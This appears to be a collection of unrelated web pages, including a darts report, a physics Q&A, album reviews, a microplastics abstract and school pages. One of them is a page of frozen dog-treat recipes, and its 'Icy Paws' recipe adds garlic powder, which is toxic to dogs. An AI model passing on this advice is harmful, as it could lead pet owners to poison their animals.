The Stone Hotel is but one of many dusty gems awaiting discovery in Daggett and Daggett is but one of many tattered tapestries found between Chicago and Santa Monica on a magic carpet of asphalt labeled Route 66. For many of these weathered and worn old towns even the resurgent passion for that legendary highway has failed to lift the veil of obscurity.
When my publisher, Voyageur Press, asked if there was a chapter in Route 66 history yet to be written, I thought of Daggett and the Stone Hotel, the tarnished glory of Afton, the remnants of Spencer, Lawndale, and forgotten Romeroville in New Mexico. And so it was an opportunity to give these forgotten places their moment in the sun that became the catalyst for my next book, Ghost Towns of Route 66http://rcm.amazon.com/e/cm?t=1968adventurer&o=1&p=8&l=bpl&asins=0760338434&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr.
I hope this book enhances your next adventure on Route 66. Moreover, I hope you find it as exciting to read as I found it to write. | https://jimhinckleysamerica.com/2011/01/07/hidden-in-plain-sight/ |
WOW this has been a tough to weeks. I am not sure I have fully recovered from my race two weeks ago. I came home and hit the ground running, no pun intended. But seriously, I've been teaching or training just about every day, even on the winter storm day. Is that good for me? Well, my body says it is. Aside from the day after the race, I have not felt too much soreness or fatigue. In part this is because I continued to move, stretch and strengthen all the muscles worked during that long, long race. There was no time for me to sit around eating all the calories burned that day and then some either.
Nutrition also plays a huge role, not only in your performance during the activity but also in how you recover. I am often asked about pre and post exercise nutrition and in general my response is to eat a clean, healthy, nutrition packed meal and of course water. But I'm no nutritionist and therefore can't give advise aside from my own general knowledge about this topic in five minutes following a class. I leave that to the experts. This article sums it up pretty well. It confirmed and provided me with some great ideas to add to my routine. I hope you find it useful as well.
Leave a comment with some of your favorite high-protein meals.
You’re done with your run, bike or swim or maybe your CrossFit WOD, and you’re so glad to chillax for the rest of the day.
But wait. Your workout isn’t really over until you address the three Rs of recovery: Rehydrate, Refuel and Rebuild.
But while many athletes guzzle sports drinks to recover, or eat a carbohydrate-rich snack, they often forget about the protein necessary to rebuild broken down muscle fibers. Without adequate protein, your muscles will take longer to recover, and some studies suggest you’ll be more likely to suffer from burnout and symptoms of overtraining.
Nonfat or Lowfat Greek Yogurt (8 oz): 22 to 24 grams protein. Greek yogurt is a must-have in most athletes’ diets because it provides more protein per calorie than most other foods.
In addition, it provides a combination of casein and whey protein, and because most of the lactose in yogurt is removed, it’s still a viable option for most people who are lactose intolerant.
Low-fat Chocolate Milk (8 oz): 8 grams protein. Low-fat chocolate milk provides a 3 to 1 ratio of carbohydrates to protein, so it helps to replace glycogen while providing the essential amino acids your muscles need to recover.
Research suggests that chocolate milk works just as well as other sports drinks for enhancing recovery among endurance athletes. Chocolate milk provides a blend of both whey and casein proteins, which may provide advantages versus foods with a single-source of protein.
More: Is Chocolate Milk Good for Muscle Recovery?
Cottage Cheese (8 oz): 28 grams protein. Non-fat cottage cheese packs in more protein per calorie than virtually any other food, making it a great option for athletes concerned about weight or trying to lean out for a competition.
Cottage cheese is one of the most naturally-rich sources of the muscle-building amino acid, leucine. For example, a cup of cottage cheese packs in 2.9 grams leucine compared to 1.4 grams in yogurt and .3 grams in an egg. The essential amino acid is considered the “limiting” factor for muscle gains and it’s why many protein supplements contain added leucine.
Eggs (1 medium): 6 grams protein. As the gold standard for protein, eggs are on the must-eat list of most amateur and professional athletes.
More: Do Eggs Help or Hurt Cholesterol?
A medium egg has just over 6 grams of protein of the highest biological value—meaning it’s complete with all amino acids in the most digestible form.
Eggs also contain 13 other vitamins and minerals—virtually everything you need with the exception of vitamin C.
Two protein-packed ways to enjoy eggs: Baked Eggs in Canadian Bacon and Protein Pancakes.
Pistachios (1 oz/49 pistachios): 6 grams protein. Pistachios make a nutritious and easy on-the-go-recovery choice. These flavorful green nuts provide antioxidants that may speed recovery, as well as potassium and sodium, two electrolytes lost in sweat.
A serving of roasted and salted pistachios contains a whopping 310 mg potassium and 160 mg sodium, compared to 35 mg potassium and 95 mg sodium found in popular sports drinks. | http://www.fitbodyhappylife.com/2013/03/protein-foods-great-recovery.html |
Tourist art production is a global phenomenon and is increasingly recognized as an important and authentic expression of indigenous visual traditions. These thoughtful, engaging essays provide a comparative perspective on the history, character, and impact of tourist art in colonized societies in three areas of the world: Africa, Oceania, and North America. Ranging broadly historically and geographically, Unpacking Culture is the first collection to bring together substantial case studies on this topic from around the world.
Ruth B. Phillips is Director of the Museum of Anthropology and Professor of Art History and Anthropology at the University of British Columbia. She is the author of Representing Women: Sande Masquerade of the Mende of Sierra Leone (1990) and Trading Identities: Native Art and the Souvenir in Northeastern North America, 1700-1900 (1998). Christopher B. Steiner is Lucy C. McDannel '22 Associate Professor of Art History and Director of Museum Studies at Connecticut College. He is the author of African Art in Transit (1994) and coeditor of Perspectives on Africa: A Reader in Culture, History, and Representation (1997). | https://www.ucpress.edu/book/9780520207974/unpacking-culture |
The utility model discloses an anti-skid pen holder, wherein an anti-skid adhesive film is arranged on the pen holder, two ends of the adhesive film are open, a bonding layer is arranged on the inner surface of the adhesive film, and bulges are formed on the external surface of the adhesive film. The anti-skid pen holder not only ensures that people can feel comfort when holding a pen with fingers, but also is free from slipping due to rolling, the anti-skid pen holder is convenient for writing and placing, and the anti-skid adhesive film can adapt to pen holders in different thicknesses, can be used repeatedly, and is convenient for product manufacture and management. | |
Please enter your email address or userHandle.
Given two integers a and b. find the smallest number x (greater than a) which is divisible by b.
Input:
The first line of input contains of an integer 'T' denoting number of test cases.Then T test cases follow.Only line of each test case contains two integers a and b .
Output:
For each case print an integer x corresponding to the answer .
Constraints:
1 <= T <= 100
0 <= a,b <= 109
Example:
Input:
2
5 3
25 13
Output:
6
26
We strongly recommend solving this problem on your own before viewing its editorial. Do you still
want to view the editorial?
Login to access your submissions. | https://practice.geeksforgeeks.org/problems/divisible-numbers/0 |
England Open Delight For Duzza
BDO world number one Glen Durrant came through a tough looking field, to be crowned England Open champion for the first time late on Sunday night at Selsey. After a disappointing Friday in the England National Singles, Durrant dusted himself down to get ready for the long day ahead on Saturday. Starting at 9 am on Saturday, Durrant worked his way through the field of over 1000 darters. Durrant won eight matches on Saturday to qualify for the semi-finals on Sunday.
In the semi-final, Duzza would face Welsh international Wayne Warren. The game couldn’t have got off to a better start for Durrant, as he found himself 2-0 up with an early break of throw. The pair then traded legs, as Durrant found himself throwing for the match and a place in the final at 5-4 up. On his own throw, Duzza looked so sharp throughout the semi-final and this leg was no different, as the world number one clinched his place in the England Open final with a 15 dart leg. Leaving the stage victorious Durrant had a 94.10 average, hitting four 180s and a checkout percentage of 53%. He would now face Conan Whitehead in the Final of the England Open. Duzza would now face around 90-minute wait for the final; he would now have to refocus and stay relaxed and mentally prepare for the final.
Durrant looked calm as he walked on for the final, but it was Whitehead who had the crowd on their feet for the walk on. With Whitehead winning the bull, the world number one would need to break the throw of the young man if he was to win the title for the first time. Durrant had a dream start to the final, Whitehead missing three darts to hold throw Durrant took out 72 for an early break of throw. This seemed to settle Duzza down as he then produced a commanding hold of throw. The duo then traded legs, until the 7th leg of the final was the pivotal leg of the final. Both players missed darts at doubles, first Durrant to break again then Whitehead to hold but it was the world number one who showed experiences holding his nerve to break throw again. Duzza then missed two championship darts in leg 8, before making no mistake in leg 9 winning the leg in 17 darts to win his first England Open title.
After the final I was lucky enough to catch a few minutes with Glen. “I felt so tight in the final but so chuffed to get over the line. Having won the England classic here are Selsey before, but never the England Open so I’m over the moon to add this to the cabinet.”
“I’m a firm believer that everything happens for a reason. On the Friday night I lost 4-0 in the first round so was in bed for 11 pm. Where some people didn’t finish playing until 3 am and were back again for a 9 am start. If I had done well on the Friday, I don’t think that I would be here winning the Open tonight. I love the EDO and love representing them, but I believe that they need a little rethink as the weekend hasn’t been the smoothest.”
“But I’m over the moon to have won this weekend, and would like to thank everyone from Harrows Darts, Harlequin Teamwear and Mac at The Sportsman Management Company for their continued support. The crowd were brilliant this evening so huge thank you to them.”
The Final Leg By Leg
Leg1
180 from both players, 1 missed dart at double from Whitehead and is punished as Durrant takes out 72 for a 14 dart leg to break throw.
Leg 2
Another 180 from Durrant as he holds throw in 16 darts.
Leg 3
Whitehead hits his second 180 to get his first leg on the board in 12 darts.
Leg 4
Durrant missed the bull for a 121 checkout but holds throw in 17 darts.
Leg 5
Drama in leg five as Whitehead hits an 180 to leave double 1; Durrant then misses three darts at double 8 to break again. Whitehead holds in 19 darts
Leg 6
Durrant very reliable on his own throw taking out 70 on double 8 for a 14 dart leg.
Leg 7
The edgiest leg of the match by far. Both players missed darts a double, but it was Durrant, who held his nerve to break again and go within one of the title.
Leg 8
180 from both players, as Durrant misses one dart for the title. Whitehead breaks back in 14 darts to keep the tie alive.
Leg 9
Durrant kicks off with an 180 as he gets to a double first. Having missed in the previous leg Durrant wasn’t to be denied taking the title in 17 darts. | http://dartsnews180.com/england-open-delight-for-duzza/ |
Q:
Coulomb's Law modified in general relativity?
It seems difficult to track down a clear explanation of this statement:
So although the Coulomb law was discovered in a supporting frame, general relativity tells us that the field of such a charge is not precisely $1 / r^2$.
Papers I've found seem to say either that the inverse square law for the Coulomb field of a massive point charge remains exactly true in general relativity, or that it has corrections on the order of $1/r^4$ and higher.
I suspect that I may be getting lost in the coordinate transformations and the in-context meaning of $r$. What I would like to know is if general relativity predicts any deviations from the inverse square law for the electric field surrounding a point massive charged particle, as seen by a distant observer.
Presumably the measurement method should be specified, so here's a possibility: Attach a charge $Q$ to an extremely massive particle, then probe the electric field of the charge by first measuring the distribution of electrons, then of positrons, shot at various energies toward the massive particle a la the Rutherford experiment. The difference between the two would be used to subtract out the purely gravitational attraction between the massive particle and the probe particles. I realize that this approach would be impractical for measuring extremely small deviations from Coulomb's law, but it should at least provide a way to dodge some of the difficulties associated with defining $r$ near a point mass. I also realize that quantum corrections would totally change things in real experiment. I'm just looking for a clear classical explanation of what happens to Coulomb's law due to the effects of gravity per general relativity.
EDIT 12/24/18: Specifically: in the scattering measurement proposed above, does it appear to a distant observer that there is a deviation from the inverse square law - a deviation that is a bit different from that due strictly to gravity?
A:
The Reissner-Nordstrom metric describes a massive point charge in General Relativity. The covariant component of the electrostatic four-potential, $A_t$, is exactly $Q/r$, but the contravariant component $A^t$ is more complicated. Similarly, the purely covariant component $F_{rt}$ of the electrostatic field, and also the purely contravariant component $F^{rt}$, is exactly $Q/r^2$ but the mixed components are more complicated.
This is in Schwarzschild-style coordinates where the area of a sphere around the charge is $4\pi r^2$ as $r\rightarrow\infty$.
There is no meaningful way to say which components are the potential and the field. The potential is a four-vector and the field is a four tensor, and they have both covariant and contravariant components which are equally valid.
Regardless of which components you use, the electric flux through a sphere at infinity is $4\pi Q$.
When you think about Coulomb’s Law, you should not think of it in the “high-school” form that the field is inverse-square. Instead you should think of it in the “university” form that $\nabla\cdot\mathbf{E}=4\pi\rho$. This equation, generalized to take curved spacetime into account, remains true when the effect of gravity is considered.
| |
What Your Personality Says About Your Career Path
Everyone knows that the workplace is a mishmash of personality types. For better or for worse, there will always be colleagues who see the world differently and have varying strengths and weaknesses. One of the most obvious ways people relate to their environments and each other is though introversion and extroversion. Both introverts and extroverts have their own unique strengths, which you can maximize in the workplace and elsewhere.
Fundamental Differences in Personality Types
Whether you’re an extrovert or introvert, accepting, owning, and enjoying your dominant personality traits can lead to a happier, more fulfilled life. Studies have found that introverts are actually wired differently than extroverts. Introverts have more blood flow in the frontal lobes of their brains and the anterior, or frontal, thalamus, which are both areas that deal with internal processing. They are great planners and problem-solvers.
Extroverts, on the other hand, have more blood flow in the anterior cingulate gyrus, temporal lobes, and posterior thalamus, which are involved in sensory and emotional experience. Other research has indicated that introversion-extroversion is actually related to individual differences in brain function.
Introverts can easily become self-aware around others, which can cause them to over-plan and overthink even simple outings. An introverted person can have a hard time figuring out the right thing to say in conversations with others. They can be social people, but still tend to reveal less about themselves than extroverts. Most introverts prefer taking some time to think before responding to a situation because they would rather develop their ideas by reflecting privately. Introverts have the ability to focus their attention more readily and for longer periods of time than extroverts. Some introverts may feel awkward or weird around groups of extroverts, but they may be attracted to an extroverted person. While many introverts seem to come across as shy and quiet individuals, not all of them are. Shy people can be introverted or extroverted. Introverts prefer keeping things low-key, rather than going to large social events.
Introverts in the Workplace
Introverts feel most comfortable working alone or in a small group, as this allows them to focus on solving problems without any distractions.
A few ideal career choices for introverts include:
- Software Engineer
- Market Research Analyst
- Translator
- Human Resources Specialist
- Accountant
According to renowned Swiss psychiatrist Carl Jung, extroversion is the ability to turn the interests and energies of one’s mind toward events, people, and things in the world around us. In psychology, an extrovert is a person concerned more about the practical realities of life rather than with one’s inner thoughts and feelings. Simply put, an individual who is keen on what is happening around them is an extrovert.
If you know someone who loves to socialize and has an outgoing personality, they are more than likely an extrovert. Extroverts make the most of the opportunities that come their ways. They don’t worry too much about “what if.” Extroverts are usually the ones who put candy on their desks at the workplace in order to encourage interactions with others. They tend to be energized around other people, and they may become bored and restless when alone.
Extroverts in the Workplace
Most extroverts are eager to land jobs that doesn’t actually feel like jobs. Extroverts thrive in positions where they are able to mingle freely with coworkers whenever they please. They prefer jobs that entail different daily duties, rather set routines.
Here are some ideal professions for an extroverted person:
- Public Relations Manager
- Elementary School Teacher
- Physical Therapist
- Sales Professional
If you are unsure of whether you are an introvert or an extrovert, taking a Myers-Briggs Type Indicator assessment is a great way to find out more about your particular traits. Once you become aware of your specific personality type, you will be able to better prevent some of the common problems that may occur when trying to fit a square into a circle. It is also helpful in further understanding yourself and what might best suit your personality type in your pursuit of happiness. When you better understand yourself, your interactions with others make a little more sense.
The Myers-Briggs personality test can be a great resource for employers and supervisors. Understanding your employees on deeper levels allows you to maximize efficiency, communication, and harmony. For example, more introverted coworkers may prefer detailed memos, whereas extroverts may prefer a conference or demonstration. Introverts and extroverts both have fantastic strengths. At their full potential, either type can become a powerhouse at the office!
—
This article originally appeared on BusinessCollective.
Jessica M. Baker is the Founder and CEO of Aligned Signs, the only patented self-discovery and relationship tool of its kind. Ms. Baker fuels her business ventures with expertise gained from nine years of experience in finance, business analysis, client management, and research. Jessica graduated summa cum laude with a Master of Business Administration in finance and a Bachelor of Science in biology from the University of Texas. | https://www.recruiter.com/recruiting/what-your-personality-says-about-your-career-path/ |
has become FelCor’s Chairman of the Board.
“Tom’s leadership and vision for FelCor over the last 15 years can be seen
throughout our Company. He grew FelCor from a REIT of six hotels and a market
capitalization of $120 million in 1994 to a portfolio of 117 hotels with a
total market capitalization of $3.2 billion. His leadership has positioned
FelCor to be strong and profitable,” said Rick Smith, FelCor’s President and
CEO. “I am very honored to be appointed to this role. I look forward to
working with Tom to build an even stronger Company as we enter a new era.”
Mr. Smith joined FelCor in November 2004 as Executive Vice President and
Chief Financial Officer. Prior to FelCor, Mr. Smith was with Wyndham
International as Executive Vice President and Chief Financial Officer. He was
responsible for that company’s financial strategy and operations. Mr. Smith
joined Wyndham International in September 1999 as Senior Vice President and
Treasurer. Mr. Smith also previously worked with Starwood Hotels & Resorts
Worldwide, Inc., where he was Vice President of Corporate Finance.
Previously, he worked for Atlantic Richfield Company and Coopers & Lybrand.
Mr. Smith also will join the Board of Directors of FelCor.
A certified public accountant, Mr. Smith graduated from the University of
Tennessee, where he received a Bachelor of Science degree in Accounting and
Business Law. | https://www.breakingtravelnews.com/news/article/btn20060208124351701/ |
Well, another day, another couple of records I’d like to call your attention to. These both came out during the first half of last year, and both inhabit kind of the mellower end of the sound spectrum, ranging from prog rock to a sort of minimalistic classical/jazz. Here we go!
35 Tapes – Home (Apollon Records, 12 February 2021)
Ole Teigen – Aske og Jord (Apollon Records, 02 June 2021)
Ok, for starters, I’d like to acknowledge and thank Norway’s 35 Tapes, because I spent quite a while wandering through a Wikipedia rabbit hole as soon as I learned what their name meant. As a lifelong fan of 70s rock, especially 70s prog rock, of course I have been familiar with the Mellotron and its distinctive sounds of strings and other instruments. But until discovering this band I had no idea how the device actually worked. It turns out, each key on the keyboard is attached to a tape head, with a loop of magnetic tape (I’m hopeful the current renaissance of cassette tapes means most younger readers out there will understand this terminology) allowing the pre-recorded sample of each note to play as long as the key is depressed. Fascinating stuff!
Of course, the band’s namesake Mellotron tapes, with their characteristic slight waveriness and fluctuation, are found threaded throughout the sextet of songs that comprise Home, as well as various other keyboards and string arrangements — sometimes sounding like they were lifted from the background of a Rolling Stones track (although not literally lifted, of course — as we all know that would be asking for trouble!); elsewhere reminiscent of sounds emanating from the fingers of Keith Emerson or Rick Wakeman; and in the case of the introduction to penultimate track “Walk,” in an upbeat style along the lines of Pete Townshend‘s “Let My Love Open the Door.”
All of this is combined with gently strummed acoustics, bluesy electric leads, or even otherworldly slide guitar parts; a soulfully shuffling rhythm section; and understated, mellow rock vocals — a summation that feels instantly familiar without being directly derivative of anything, an aptly titled album that makes the listener feel right at home.
The other release I’d like to discuss with you also comes from Oslo — in fact, it’s a solo venture by Ole Teigen who is also known as one-third of Superlynx (whose last two LPs were covered on this website just last month).
Also including six tracks, Aske og Jord (in English, “Ashes and Earth”) was written in response to the tragic loss of its creator’s brother (and first performed at a memorial for the elder Teigen), while the album’s sleeve features artwork by both siblings.
A few of these pieces are morose piano and cello duets, in a modern classical style — most others use a traditional piano/bass/drums jazz combo instrumentation, including the title track in which the trio performs a gloomy waltz. And finally, closing number “Fugl” (in English, “Bird”) is a serene, speculative piano solo.
Personally, as I suspect may be the case for most folks reading this, I did not know Karl Teigen, but the emotion outpouring from Ole‘s beautiful tribute paints a loving and sorrowful picture that we all will find both comforting and relatable. | https://valleyofsteel.net/2022/01/19/35-tapes-home-ole-teigen-aske-og-jord-2021/ |
Skip to Main Content
It looks like you're using Internet Explorer 11 or older. This website works best with modern browsers such as the latest versions of Chrome, Firefox, Safari, and Edge. If you continue with this browser, you may see unexpected results.
Your ATA Library
Resources
Curriculum
Fine Arts Grades K-6
Music
Enter Search Words
Search
Fine Arts Grades K-6
Videos, interactives, and tools focused on art in the elementary grades
Art
Drama
Music
Appreciation/Composers
Instruments
Making Music
DK: Musical Instruments Quiz
How well do you know musical instruments? Here's a 10 question quiz that will test if you know brass vs woodwind and the different sounds that instruments make.
DK: Types of Music Quiz
Test your knowledge of different types of music. These 10 questions cover music styles including Indian, blues, gospel, Irish and more.
One Minute Music Lesson
Here is a one minute music lesson about why music is so great!
Starfall: Music Composers
Read these books about some famous music composers and listen to their music.
TED: How to Read Music
This video is filled with graphics that help you learn to read music. Use the short quiz in Think to test your understanding. Dig Deeper to continue learning about music.
Artsville Episode 2: Musical Families
This episode introduces the components of an orchestra: Strings, Brass, Woodwinds, and Percussion.
CBC Kids: Can you guess the country from the musical instrument?
Look at the instrument in the photo, read the description and try to guess where in the world you are. The description has some clues if you're paying attention.
DK Find Out: Celtic Music
Learn a bit more about Celtic music, which can include the traditional music of Ireland, Scotland, Wales, Cornwall (England) and Galicia (Spain). This article also has an Irish harp to explore.
DSO Kids: Listen
You can listen to many different instruments in the orchestra. Use the Learn + Listen menu at the top of the page to listen to different composers.
Music Games
Discover lots of music games available here!
TED: Mysteries of vernacular: Ukulele
How did the ukulele get its name? Learn how the ukulele came to Hawaii and was taken up by a member of the king’s court, nicknamed Jumping Flea, (ukulele in Hawaiian) who shared his love of the instrument.
Bubble Beats
The sea creatures are playing a beat on their drums. Listen to the first beat. Listen to the other creatures play. Which beats are the same?
Chrome Music Lab
This site is collection of experiments that let anyone, at any age, explore how music works. Do some experimenting yourself. Click on an image and then start to play. Take your time and experiment with your screen, keyboard or mouse.
Drum Machine
Explore the rhythm by adjusting the controls (volume, shuffle, bounce, FX, tempo) and the other elements to create your own original music.
Feel the Music
You can use music to express your feelings. Make the music sound happy, sad or excited. Change the feelings using the weather in the corner.
Music Maker
Choose a place to hang out while you make music. There's a bamboo grove, a junkyard and a magical forest. You can adjust the sounds of the "instruments" to make them higher or lower.
Music Games
Discover lots of music games available here!
<<
Previous:
Drama
Last Updated:
Dec 3, 2020 10:01 AM
URL:
https://teachers-ab.libguides.com/artsk-6
Print Page
Login to LibApps
Report a problem
Subjects:
Art
,
Drama
,
Music
Tags:
drama
,
drawing
,
music
,
painting
,
photography
,
printmaking
,
puppetry
, | https://teachers-ab.libguides.com/c.php?g=707973&p=5040428 |
With that hot time of year here, I thought this would be a great time to share some ‘cool’ doggie recipes! This summer heat gets to all of us and our canine companions too so here are some homemade summer treat recipes with coolness in mind!
Peanutty Pupcicles
1 ripe banana
1/2 cup peanut butter
1/4 cup wheat germ
1/4 cup chopped peanuts
Mash banana’s and peanut butter, stir in wheat germ. Chill 1 hour. Place in container,
store in refrigerator or freezer.
Fruity Yogurt Treats
2 kiwi fruit — mashed, or jar baby food fruit
8 ounces strawberry yogurt — or other
Mix together, freeze in ice cube tray. serve.
Frozen Peanut Butter Yogurt Treats
32 ounces vanilla yogurt
1 cup peanut butter
Put the peanut butter in a microwave safe dish and microwave until melted. Mix the yogurt and the melted peanut butter in a bowl. Pour mixture into cupcake papers and freeze.
Icy Paws
2 cartons plain or vanilla yogurt (32 oz each)
1 small can tuna in water (8oz.)
2 tsp. garlic power
24 3 oz. plastic cups (not paper)
Open yogurt, if they are full to the top use a spoon & scoop out one cup. (these will be
frozen as plain yogurt). Put half of the can of tuna in each yogurt container add the garlic
power (1 tsp. in each) & stir thoroughly.
Use a spoon & scoop the mixture into the cups. Place on a tray & freeze
overnight. Makes about 24 treats.
VARIATIONS:
Mix in garlic powder, brewers yeast & fennel seed. Veggie Delight: Mix in cooked peas
or other vegetables.
Chicken Icy Paws: use canned chicken instead of tuna
Potassium Boost: Add in a mashed banana.
Best served outside, they can get a little messy. | https://mydogloverspress.com/2020/06/03/4-frozen-dog-treat-recipes/ |
Masyu puzzles are here!
I occasionally get requests to add new puzzle varieties to the collection. I have to ignore a lot of these, because there are 24 hours in a day. However, the last request I received, for Masyu puzzles, was hard to ignore, since I’ve enjoyed solving these myself for the past few years, and I’d love to have access to a larger collection of them. So what the heck! I made a bunch.
Masyu puzzles are closely related to Slitherlink and other spatial reasoning puzzles. Like Slitherlink, the end result is a loop which is constructed from straight line segments.
Unlike Slitherlink, Masyu puzzles don’t use numbered clues. Instead, the clues are black and white circles, which I am told resemble pearls (although I think they resemble the stones in the board game Go). This gives the puzzles an elegant simplicity which is perhaps only rivaled by Galaxy puzzles, another great Nikoli-style puzzle.
Masyu puzzles use the following rules:
- Black circles indicate corners.
- White circles indicate straights.
- Black circles must be turned upon, but the loop must travel straight through the next and previous cells in its path.
- White circles must be traveled straight through, but the loop must turn in the previous and/or next cell in its path.
If you’d like to learn more about how to solve the puzzles, I’ve written a (hopefully) helpful tutorial, which you’ll find here. If you find the tutorial less-than-helpful, let me know, so I can work to improve it.
If you’re ready to try your hand at these puzzles, check ’em out!. | https://blog.krazydad.com/2014/05/09/masyu-puzzles-are-here/ |
There is a growing concern regarding plastic pollution, its distribution and effects on the ecosystem, both within the scientific community and among the public. Scientists have measured microplastics (plastic fragments less than 5 mm size) in almost every corner of the world, including in the marine environment, both in the sediment and the water column. The accumulation of microplastics in the food web is threatening the ecosystems health but microplastics have been detected in fish and other marine organisms as well as in birds, mammals and lately in human stool in number of publications. The sewage is an important source of microplastic pollution in the costal sea, depending on the sewage treatment, more or less of the microplastics ends up in the sea. This study is the one of first records of the occurrence and composition of microplastics in Iceland. The sampling site Eyjafjörður, is the longest fjord in Iceland, located at the north coast. Several small towns are situated by the fjord, the far biggest being Akureyri with 18.000 inhabitants. None of them has any sewage treatment installed. The samples were prepared for analysis using a density separation with Zink chloride and filtered on 1 µm glass fiber filter. A fast and sensitive method based on detection by pyrolysis GCMS was developed and adopted for the study. The results shows considerable amount of microplastics in sediments in the vicinity of the sewage outlet of Akureyri. | http://biologia.is/files/agrip_2019/V45.html |
Q&A with First Lady Lynne Kesselman
Two-time Stockton alumna shares her journey as a woman in STEM.
by Samantha Cary ’13
by Samantha Cary ’13
First Lady Lynne Kesselman is a two-time Stockton alumna (she earned a bachelor’s degree in Business in 1982 and a Master of Arts in Instructional Technology in 2005) and a nationally recognized technology educator, who taught computer technology at Egg Harbor Township High School for more than 14 years.
Kesselman’s interest in promoting computer science among students has continued at Stockton. As the president and founder of the Computer Science Teachers Association Southern New Jersey (CSTA-SNJ) chapter, she helped organize annual CSTA-SNJ computer science competitions, beginning in 2015, at Stockton. CSTA also co-sponsored the inaugural StockHack, a 24-hour innovation, design and technology competition, with Stockton Computer Society and Information Technology Services in February.
In the following Q&A, Kesselman shares her journey as a woman in STEM, her inspiration, and her vision for the future of STEM for women and young girls.
Q: Why did you choose Stockton?
A: I came for a campus visit and everyone was so friendly and enthusiastic about being on this campus. I went for a walk around the lake and it was one of those gorgeous days where you walk around the lake and you don’t ever want to leave, and I just didn’t want to leave. I had a great chat with Ken Blue in Admissions. He looked over my materials and told me, “You would be a great fit here,” and I really felt like I would be a good student here.
Q: How did you get involved in technology education? Who or what inspired you to do
so?
A: As a Business major, I took programming courses which then put me in a position to be able to teach programming at the high school level as a K-12 certified business educator, teaching the use of applications and Microsoft. As I was watching my students, they got really creative when they started drawing or working on projects overlapping different shapes in ClipArt to create new shapes. I started looking at other kinds of software they could use to enhance those pictures and images. Watching my students being so creative in their work made me want to become a better teacher and be able to give them more tools that they needed.
Q: Describe what STEM initiatives you’re involved in with the CSTA-SNJ chapter and
at Stockton.
A: For me, in that organization, what I think is one of the most important and enriching opportunities is to create a network of guest speakers who can come in and talk about topics that are important to educators in the STEM fields and mostly computer science – not just programming, but the creativity of the concepts of computer science, and engaging students at a young age so that they realize it is an opportunity for them to have a career path in computer science.
At Egg Harbor Township High School, we participated in the Adobe Certification program where students would become certified in different kinds of Adobe software, including Adobe Flash, which creates animation and games. I worked with the art teachers to have them present in class and explain more about the drawing techniques they could use in the software. Now, a lot of the art teachers, even in the younger grades, have started to incorporate a little more technology into the artistry that they are using, so students could use technology and the artistry at the same time.
Q: What are some of your goals for providing opportunities for women to pursue careers in technology? What would you like the future to look like for women in STEM?
A: I think it’s really important that young women and young children know that they can use computer science, computer technology and STEM careers to create a difference, to give a voice and to fulfill a need – be it a societal need, a technology need or even just a fun kind of need. I would like to see them have access to the tools that they need, be it free software or some technology to use. A lot of software companies are moving to offer free software for their applications to create new apps, and I think that works as a springboard for young people to create a change and do the things that they’d like to do because they have that ability and technology in their hands.
Q: What advice do you have for young women considering an education and career in
STEM, particularly technology?
A: Don’t be afraid. Don’t be afraid to try something new. We have people who are in their second, third or fourth careers now trying to learn computer science, and they are always learning something new. Young people right now have an opportunity to just open their eyes and look out and see so much that they can do. It can be a little overwhelming at times, so work with your teachers and get them to help you pick what you would like to do and how you can use your best strengths. But don’t be afraid to try something new.
Learn more about First Lady Lynne Kesselman and her initiatives at Stockton University. | https://stockton.edu/stocktonnow/summer2017/lynne-kesselman.html |
Saturday, July 16, 2022 • Hamlin, NY • Course Map
Part of a two-day series of races that features a 13.1-mile half marathon, 5K and races for kids in addition to its triathlon, the Shoreline Multisport Festival celebrates its 39th running this summer, and its fifth annual with the half marathon race distance.
As its name suggests, the race will take runners along the shoreline of Lake Ontario here in the part of western New York State known as the Genessee region, just a short drive west from nearby Rochester.
The race unfolds largely within Hamlin Beach State Park, a popular park whose beaches attract thousands of visitors between Memorial Day and Labor Day every year, and which also features more than 10 miles of hiking and biking trails in addition to its one-mile nature trail near the beach.
For the half marathon, the running events take place on Saturday, while the triathlon takes place on Sunday. The race has a long history as one of the country’s oldest continuously running triathlon events, dating all the way back to its first running in 1980.
The course for the half marathon will unfold along the park’s hiking and biking trails as well as its paved park roads, and race organizers say the course is “relatively flat” though runners should expect to encounter uphills and downhills as well as rocks, twigs, tree limbs and perhaps even muddy terrain in spots, depending on the weather in the days leading up to the event.
The race organizers — the Rochester, N.Y.-based race event management company YellowJacket Racing — add that awards will be given out for the half marathon for the top overall male and female runners, as well as for the top 3 runners in each age group.
Note: A virtual option is available for this event, to be run anytime from July 15 to July 24. Registration details are included below.
Race Weather & Climate
Located near the shores of Lake Ontario in western New York State, about 25 miles northwest of Rochester, Hamlin typically sees its warmest weather of the year in July, which has brought record temperatures here as low as 44 degrees (in 1963) and as high as 98 degrees (in 1966).
- July 16 average low temp: 65ºF
- July 16 average high temp: 74ºF
Past Results
- 2021 Shoreline Half Marathon results
- 2020 Shoreline Half Marathon Results (Virtual)
- 2019 Shoreline Half Marathon Results
- 2018 Shoreline Half Marathon Results
- 2017 Shoreline Half Marathon Results
- 2016 Shoreline Half Marathon Results
- 2015 Shoreline Half Marathon Results
- 2014 Shoreline Half Marathon Results
- 2013 Shoreline Half Marathon Results
- 2012 Shoreline Half Marathon Results
- 2011 Shoreline Half Marathon Results
Course Map
See the race route map for the Shoreline Half Marathon here.
Starting Time
- 7:00 AM – half marathon
- 7:15 AM – 5K
Fees
- $75 and up – half marathon
- $30 and up – 5K
Registration
To reserve your spot in the 2022 running of Hamlin’s Shoreline Half Marathon or 5K race, register online at RunSignUp.com here.
Official Race Website
Comments
Ever run in the Shoreline Half Marathon? Share your impressions here, or post your review in the Comments below. | https://www.halfmarathons.net/new-york-shoreline-multisport-festival-half-marathon-5k/ |
rt activities at Greenside range from painting, drawing, sculpture to portraiture and abstraction. Sensory art sessions encourage students to explore materials, shapes and colours while more advanced workshops encourage students to explore their own creative ideas and develop new techniques.
A group of senior students from Greenside recently went on a trip to Tate Modern to be part of a workshop with Undergraduate Art students from Kingston School of Art.Greenside and Kingston student worked side by side in groups with a worksheet nd selection of materials and were invited to make in the galleries in response to works of art. This is the first of two workshops led by Bil Leslie intended to help Tate develop their SEND provision.
Bronze Class have been drawing lines on the walls and floors, using ribbon to make spaces for movement and using these shapes to create screen prints.
Strawberry art studio from Greenside School on Vimeo.
Art Club
We have been running a lunchtime art club for students from Greenside and Barnwell School. Over the past term they have worked together to construct a sculpture on top of an old tree stump. The sound for this video has been made by the students working with Jon to cretae music, lyrics and descriptions of their art work. | http://greenside.herts.sch.uk/Creative/Art/Art.html |
